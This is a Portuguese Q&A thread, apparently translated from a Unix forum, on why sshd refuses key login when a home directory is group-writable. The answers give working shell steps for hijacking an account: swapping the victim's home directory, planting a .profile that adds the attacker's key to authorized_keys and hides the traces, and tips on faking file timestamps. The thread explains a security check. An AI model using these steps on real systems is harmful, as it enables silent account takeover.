Início / unix / Perguntas / 755724
Accepted
Matthias Ronge
Asked: 2023-09-04 22:10:55 +0800 CST

Por que é um risco de segurança para o SSH com chave pública-privada se a pasta pessoal é gravável para o grupo?

  • 772

Passei muito tempo tentando descobrir por que o SSH com uma chave pública-privada não estava funcionando para mim entre dois servidores. Descobriu-se que o motivo era que o diretório inicial do usuário era gravável para o grupo no servidor ao qual tentei me conectar.

Qual é o maior risco de segurança para o SSH negar login de chave pública-privada, quando a pasta do usuário pode ser gravada no grupo versus quando não pode ser gravada no grupo? Entendo a justificativa para a limitação restritiva esperada da própria pasta .ssh e, portanto, dos arquivos dentro dela. Mas, por que existe um perigo para o próprio diretório inicial? Que constelação pode fazer isso perigosamente?

ssh

2 respostas

  1. Se o diretório inicial for gravável em grupo, qualquer usuário desse grupo poderá modificar o .sshpróprio diretório, por exemplo:

    mv ~some_user/.ssh /who/cares/where
mkdir ~some_user/.ssh
cp /my/public/key ~some_user/.ssh/authorized_keys

    E obtenha acesso à conta desse usuário.

    • 4
  2. Best Answer

    Se /home, ou qualquer outro pai de um .sshdiretório for gravável, posso tirar os filhos diretos do caminho, causando pelo menos uma negação de serviço:

    ls -ld /home
drwxrwxrwx 9 root root 20480 Sep  4 21:28 /home

mv /home/victim /home/casualty

    Agora victimnão é possível fazer login com uma chave ssh. (No entanto, uma senha ainda funcionaria.)

    Vamos supor que a “vítima” tenha uma senha válida e possa ignorar a falha da sshchave como apenas uma dessas coisas. Principalmente porque (esperamos) não será um problema reproduzível. Neste cenário, podemos criar uma escalada silenciosa de privilégios:

    # Save the original directory and contents
mv /home/victim /home/casualty
mkdir -m777 /home/victim

# Create a fake profile to place and then hide the evidence
cat <<'EOF' >/home/victim/.profile

if [ -r /tmp/.id.pub ] && [ -d /home/casualty ]
then
    # Not really very nice
    mkdir -m700 -p /home/casualty/.ssh
    cat /tmp/.id.pub >>/home/casualty/.ssh/authorized_keys
fi

mv /home/victim /home/victim.nomore
mv /home/casualty /home/victim

if [ "$SHELL" = /bin/bash ]
then
    if [ -f /home/victim/.bash_profile ]
    then
        . /home/victim/.bash_profile
    elif [ -f /home/victim/.profile ]
    then
        . /home/victim/.profile
    fi
else
    [ -f /home/victim/.profile ] && . /home/victim/.profile
fi

rm -rf /home/victim.nomore
EOF

    Finalmente, coloque sua própria sshchave pública /tmp/.id.pube espere que a vítima faça login. Depois que ela fizer isso, você descobrirá que sua própria sshchave foi adicionada à authorized_keyslista e poderá fazer login como ela:

     ssh victim@remoteHost

    Para ganhar pontos extras, você pode estender o ataque para capturar o carimbo de data original no authorized_keysarquivo e restaurá-lo após adicionar sua própria chave (veja stat --format '%Y'e touch --date).

    Se o cenário for simplesmente que o próprio diretório inicial de um usuário seja gravável, então, que eu saiba, gere apenas uma negação de serviço contra as sshpróprias chaves:

    cd ~victim
mv .ssh .ssh.casualty

    Deixe assim, para que sshas chaves não estejam mais disponíveis, ou tente adicionar uma nova chave:

    mkdir -m755 .ssh
cat /tmp/.id.pub .ssh.casualty/authorized_keys >.ssh/authorized_keys

    Neste segundo caso ssh, objeta e o ataque falha:

    Sep  5 15:16:51 pi sshd[16695]: Authentication refused: bad ownership or modes for directory /home/victim

    A propriedade e as permissões ainda estão marcadas .sshe .ssh/authorized_keys, no entanto, você não está realmente em melhor situação.

    • 2

relate perguntas